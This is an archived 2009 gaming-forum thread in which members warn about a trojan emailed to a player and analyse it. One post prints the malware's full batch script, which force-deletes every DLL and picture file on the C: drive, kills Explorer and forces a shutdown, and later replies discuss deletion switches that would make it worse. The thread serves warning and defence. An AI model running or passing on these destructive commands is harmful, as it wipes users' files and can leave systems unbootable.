View Full Version : Warning: Do not open emails with "Constipated Silkworm" attachments
Malevol3nt
27 Mar 2009, 19:27
I'm not sure if this is an isolated incident or if someone is targeting e-mails from some worms related website.
I got this in my e-mail today:
http://i43.tinypic.com/54dpch.jpg
I figure this is someone posing to be Pisto, probably trying to hurt his reputation or something. In any case, if you get this kind of e-mail do not open the attachment or run the application in the archive. It will mess up your windows settings and force your OS to shutdown (you will get a 1 minute countdown with a message "hacked by 0"). Easily fixed via safe mode or just using a backup.
But in any case I just thought I'd warn ya.
CyberShadow
27 Mar 2009, 20:25
Please forward me the e-mail and, if you can, the full headers. (In Gmail, this is called "Show original" in the drop-down menu, it may be different with whatever webmail you're using.)
My address is thecybershadow@gmail.com .
By the way, a timed shutdown can be cancelled by running the command: shutdown -a
CyberShadow
28 Mar 2009, 00:34
I checked the e-mail and the attachment. Here are my results:
The attachment is a RAR archive containing three files: ConstipatedSilkworm.exe, Hooktap.dll and readme.txt.
readme.txt contains a copy of the e-mail text (starting from the 2nd line onwards). Hooktap.dll is just W:A's DXMfc.dll, copied from a W:A installation and renamed to Hooktap.dll. It's not used at all by the .exe file.
ConstipatedSilkworm.exe is an UPX (http://en.wikipedia.org/wiki/UPX)-packed executable written in PureBasic (http://en.wikipedia.org/wiki/PureBasic). It has a WormKit icon. It's possible that it's one of those "batch file compilers", which do nothing but wrap an executable around a batch file, which would drop and run the said batch file.
From my limited analysis, the program seems to drop (to a temporary folder) and execute the following batch file (which is loaded from the program's resources):@ECHO OFF
CD C:\
DEL /F /S /A *.dll
DEL /F /S /A *.png *.bmp *.jpg
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
C:\WINDOWS\system32\shutdown.exe -S -F -T 60 -C " Hacked by 0"The batch file is executed in a hidden window (no command prompt window is displayed). This code attemts to delete all DLL (http://en.wikipedia.org/wiki/Dynamic-link_library) files (program and operating system components), as well as picture files with the .png, .bmp and .jpg file extensions from the entire C: drive (if it's the current drive, otherwise it will only delete files from under the current folder). Afterwards, it terminates the Windows Explorer process (repeatedly, probably in an attempt to defeat its auto-restart feature) and initiates a delayed shutdown (with a 60-second timeout). The trojan may have more behavior code, I haven't analyzed the entire program's code.
I have also determined the sender's WormNET identity, but it's up to Malevol3nt if he wants it disclosed to the public.
Doubletime found a tutorial on the Internets... big deal!
I don't know which is more insulting: that there's someone in the Worms community trying to spread malware to us for no reason, or that their malware is so... crude! I mean, if you're going to try and completely ruin someone's computer, you might as well do something better than 'delete all .dlls'. The only thing that says "I'm not a 8-year-old messing around, I'm actually trying to make you go insane here!" is the 60-second countdown and message!
what do the /F /S /A attributes mean?
robowurmz
28 Mar 2009, 16:14
/P Prompts for confirmation before deleting each file.
/F Force deleting of read-only files.
/S Delete specified files from all subdirectories.
/Q Quiet mode, do not ask if ok to delete on global wildcard
/A Selects files to delete based on attributes
attributes
R Read-only files S System files
H Hidden files A Files ready for archiving
- Prefix meaning not
So he couldn't even use the /A switch properly either.
I mean, /Q would have been much worse.
CyberShadow
28 Mar 2009, 16:43
/Q would have made a difference if he'd used "*.*".
Malevol3nt
28 Mar 2009, 18:21
The thing hasn't managed to erase a single file. I ran it on accident as I was trying to extract the files.
But as I said in the wcc forums, it boggles my mind that someone was actually plotting this hack the whole time, coding something directly aimed at me even tho I've never done any harm to this person.
Some kids just never grow up or learn when they've crossed the line.
pfffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffff
I ran it on accident as I was trying to extract the files.
Smart.
But as I said in the wcc forums, it boggles my mind that someone was actually plotting this hack the whole time, coding something directly aimed at me even tho I've never done any harm to this person.
"Plotting" may be too strong a word here. I mean, it couldn't have taken more than half a minute to plan and make.
Also, are you sure it's against you, and not against Pisto's reputation?
Some kids just never grow up or learn when they've crossed the line.
Heck yes, I totally hate those people too! They're always jerks!
...
Why do I get a forboding sense of distinct irony?
It won't delete anything system critical because of Windows File Protection or whatever it is called (it was implemented back in Windows ME first iirc).
Koen-ftw
29 Mar 2009, 00:47
It won't delete anything system critical because of Windows File Protection or whatever it is called (it was implemented back in Windows ME first iirc).
But it can still delete your personal pictures which is a horrible thing to do to someone...
Who would do such a thing?! I mean it's not even funny! He didnt cross the line, he cut the line if you know what i mean. That is pretty messed up. is there anyway we can ban him? And why cant you tell us his wormnet name? I never want to play with him so can you tell me? I wont tell anyone. Please....
Also, how can there be someone as dumb and simple-minded as MrE? Yet again?
I send yuo hax u open it kkkkkk?
CyberShadow
29 Mar 2009, 18:36
It won't delete anything system critical because of Windows File Protection or whatever it is called (it was implemented back in Windows ME first iirc).
When I ran it on a virtual machine, WFP failed to restore files from its cache and asked for a Windows XP SP3 CD (I don't have an SP3 CD). Even if you have a CD, I doubt that WFP would cover all system DLL files. After the reboot, the system couldn't boot up.
CyberShadow
29 Mar 2009, 20:02
WFP wasn't really designed to handle a global deletion of DLL files.
WFP wasn't really designed to handle a global deletion of DLL files.
does this mean you're defending M$, or are you just pointing out where it's weakness is :rolleyes: hihihi j/k
CyberShadow
29 Mar 2009, 21:16
If you want to prevent random programs from crippling your system, launch them as a limited user. The default Windows XP user has administrator privileges, for compatibility reasons (there is just so much software that requires having administrative rights for no good reason). When Windows Vista introduced UAC and virtualization, software developers were forced to pay more attention to the principle of least priviledge (http://en.wikipedia.org/wiki/Principle_of_least_privilege). Of course, none of this helps targetted attacks (like this one) from messing with your personal files. The only way to defend against this type of attacks is to run all suspicious files in a virtual machine, or thoroughly analyze them before running them (which isn't possible for most end-users). No anti-virus or firewall software can defend against a targetted attack.
Which is why you should run Linux (and keep regular backups of ~ somewhere in /)
darkfoot
29 Mar 2009, 22:13
well as a member of xDMx i know who this fool is and he will not play in any xDMx host in wormnet.
what a tool if it aint racist sum nicking your name and causing trouble for you "f4st" it's some tool sending you hack's and trying to crash ya pc.
is it not time for team17 to ban them from wormnet?
darkfoot has chosen not to receive private messages or may not be allowed to receive private messages. Therefore you may not send your message to him/her.
I don't know who else Mal has told, but please continue to keep the name quiet for the moment. I'm still a little skeptical.
if it aint racist sum
This line makes no sense! Seriously, it hurts my brain just to try and decypher it!
*Scum?
Hope your brain feels better
When I ran it on a virtual machine, WFP failed to restore files from its cache and asked for a Windows XP SP3 CD (I don't have an SP3 CD). Even if you have a CD, I doubt that WFP would cover all system DLL files. After the reboot, the system couldn't boot up.
Oh, maybe it is improved in Vista/Windows 7? I knew the Windows ME implementation was buggy (or at least the software for Windows 9x at the time hated it) But I thought it was improved in XP, I guess software just got better rather then MS improving WFP.
darkfoot
30 Mar 2009, 13:56
This line makes no sense! Seriously, it hurts my brain just to try and decypher it!
if all you have to do is point out spelling mistakes what a great life you "dont" have :o
plasma get over ya ego and go get some sun :)
the number of letters is what likely confused him, if the number of letters and the starting and last letters all matched the word Scum then he likely would have worked it out.
*Scum?
Hope your brain feels better
Sense made.
if all you have to do is point out spelling mistakes what a great life you "dont" have :o
I wasn't pointing out a spelling mistake, I was honestly confused as to what you were trying to say!
I don't know who else Mal has told, but please continue to keep the name quiet for the moment. I'm still a little skeptical.
please tell me when the moment has come to reveal the secret! im dying to tell google the name and soon the world will know. but yes, im not fully convinced yet either... lets wait for the last pieces of evidence being put together and for the judge to pronounce the person in question guilty.
"Stop...The law has been broken. He who breaks the law shall be punished. Back to the House of Pain"
So can you say who it was already?
please tell me when the moment has come to reveal the secret! im dying to tell google the name and soon the world will know. but yes, im not fully convinced yet either... lets wait for the last pieces of evidence being put together and for the judge to pronounce the person in question guilty.
"Stop...The law has been broken. He who breaks the law shall be punished. Back to the House of Pain"
The only reasons anyone who is not directly involved in the situation would want to know are of a conceited and judgmental nature. Unless the person in suspect had intentions to continue this type of behavior, which I can assure you they do not, then matters would be different. I ask politely for confidence in the matter as a chance for total social exclusion from a befriended community to be avoided in the respect that this person is truly sorry for their actions and would benefit greatly from an understanding surrounding.
[insert smartass comment]
Scrub555
30 Mar 2009, 21:31
The only reasons anyone who is not directly involved in the situation would want to know are of a conceited and judgmental nature. Unless the person in suspect had intentions to continue this type of behavior, which I can assure you they do not, then matters would be different. I ask politely for confidence in the matter as a chance for total social exclusion from a befriended community to be avoided in the respect that this person is truly sorry for their actions and would benefit greatly from an understanding surrounding.
Truly sorry? Surely you could give his explanation?
There is no justification to be given, it was plainly an inconsiderate and immature act
Malevol3nt
31 Mar 2009, 00:10
There is no justification to be given, it was plainly an inconsiderate and immature act
So you taked to him yet? I'd really like to know what possible reason he would have as a justification for what he's done. For the record, after our little dispute a bunch of months ago, we settled to friendly terms. We even played a few games and everything seemed friendly.
But I haven't seen or played with him for at least 3-4 months maybe more, so I really don't understand why he would target me for any reason at all, other then him having some blatant "showing-off" attitude.
this person is truly sorry for their actions and would benefit greatly from an understanding surrounding.
I'm... sorry, how did that person go from trying to completely ruin both a computer and it's images using identity fraud to somone that's completely sorry for the act and will never even have a second thought about it? What, did the gods themselves come down to him and show him the path to righteousness?
[insert smartass comment]
HEY! MY MOTHER WAS A SAINT!
Some people suffer brainlags sometimes - perhaps this one was severe....
robowurmz
31 Mar 2009, 07:32
Oh hey there, Dishonesty, I wonder if this guy is Lying? Oh no, he couldn't possibly be, he only absentmindedly tried to delete a heap of system files and frame pisto by mistake.
Yeah. Sorry my ass. What he just did is strictly illegal under the Computer Misuse Act - any victim of this could press charges if they wanted to. This isn't a bit of fun, it's crime. Oh yeah, it's just a little thing that didn't even work, but the intent was there. Obviously he was concious of his actions - therefore he is liable under law.
All we know is that this guy is in Green's clan, is of Green's nationality or is Green's boyfriend.
Shirdel
31 Mar 2009, 09:07
Do you think someone should tell Pisto about this? I mean, after all, he is the one who's been framed.
Do you think someone should tell Pisto about this? I mean, after all, he is the one who's been framed.
Read this: http://forum.team17.co.uk/showpost.php?p=690313&postcount=10
What he just did is strictly illegal under the Computer Misuse Act - any victim of this could press charges if they wanted to. This isn't a bit of fun, it's crime. Oh yeah, it's just a little thing that didn't even work, but the intent was there. Obviously he was concious of his actions - therefore he is liable under law.
Anyone can press charges against anyone, but the chances of winning depend on the circumstances, and these are not the best conditions.
You have better chances of f****ng a lion in the butt without getting hurt instead of being found guilty of harming somebody in a virtual medium, lol.
The only way of busting somebody is by sputtering him and getting him while doing it- then you can have a solid case.
All we know is that this guy is in Green's clan, is of Green's nationality or is Green's boyfriend.
no, no, and no.
or was it
no, no, and definitely yes
or
no, no and he would wish that was true
anyway, its
no, no for sure, and then... well yea, i'm not into greens private life xD
no, no, and no.
or was it
no, no, and definitely yes
or
no, no and he would wish that was true
anyway, its
no, no for sure, and then... well yea, i'm not into greens private life xD
Now we know he is also Gnork's friend.
Boy friend, not boyfriend. The space between boy and friend denotes that there's a distance between them, which may not apply in Green's case.
Now we know he is also Gnork's friend.
ROFL
wrong again dude.
another No! for you. But yea, I've played with him a couple of times long long ago. This all surprises me, cz he doesn't match the profile of somebody I would expect this kinda nonsense from. Then again, your well known neighbour can be a serial killah -.-
Boy friend, not boyfriend. The space between boy and friend denotes that there's a distance between them, which may not apply in Green's case.
which space? i've only read boyfriend. without space. lol
I was cautious in regard to Yakuza's statement about you.
Speaking of things like this, I've just noticed that amongst my PM's is one from some guy named "aerosoul" sending me a PM to some random website - however the link appears to go to a .pdf file.
The PM dates back to the 14th August so its old and this situation could have already been delt with but basically does anyone remember anything like this ever been said on here?
yea just delete the PM, it was back when some virus was going around the internet.
it was back when some virus was going around the internet.
talking about a virus... what's gonna happen tomorrow when Conficker gets active? :p seems like nobody knows?
What's Conficker?
Is that another of them Scientists' doomsday maker machines that creates black holes under europe and have time traveling Dinosaurs that come from the future to warn us of this impending doom that once destroyed the Dinosaurs of the past who created their own version of this machine?
Or is this something totally different?
Roboslob
31 Mar 2009, 21:23
Its something totally different. Or is it? No one is sure what it will, currently it is spreading itself around, and on april 1st it is supposed to activate, alowing the creator to control the infected computers. You may be able to see if you're infected by trying to go to any website that offers virus protection, and if you are unable to reach those sites, there is a good chance you've got the virus. I'm not sure what you can do to get rid of it.
Good job I'm on Linux then :D
I've read that it tries to access a file on one of thousands of domain names, so it could be it updates itself or something.
Here's a 55+ pages thread about not being able to: access anti-virus websites, update anti-virus software (or some other anti-something stuff), run any Sysinternals applications...
http://www.techtalkz.com/computer-security/515329-cannot-access-antivirus-sites-google-avast-etc.html
After asking for some help and doing some research, I found what seems to be the common solution for the problem:
http://www.techtalkz.com/computer-security/515329-cannot-access-antivirus-sites-google-avast-etc-54.html#post2053764
robowurmz
1 Apr 2009, 07:39
He'll probably deactivate the virus and be all "APRIL FOOLS"....
Thanks for the tips there MihaiS.
If anybody here gets it, we'll know what to do!
Well, it's April Fools. So, what now? I think that all shall be revealed. (Possibly.)
Did the internet collapse yet? hmmm... guess not.. I can still post :/
So, the case is closed by the guy's anonymous apologize? I can fully understand that people make mistakes and we should be forgiving, however in my opinion, if this guy actually is from the community, I think the people in the community should be let to know who he is.
Yes, I vote for Malevol3nt disclosing his nick - what was the point for making this thread if he doesn't want to tell the name when it's known(?) then?
Again, I understand people make mistakes.
robowurmz
7 Apr 2009, 13:29
The Conficker worm... is doing some strange things.
http://i.gizmodo.com/5197148/how-the-conficker-problem-just-got-much-worse
Malevol3nt
7 Apr 2009, 16:51
what was the point for making this thread if he doesn't want to tell the name when it's known(?) then?
Again, I understand people make mistakes.
I opened this thread because I thought this e-mail was sent to other accounts from the Team17 forum and not just me.
vBulletin® v3.8.6, Copyright ©2000-2013, Jelsoft Enterprises Ltd.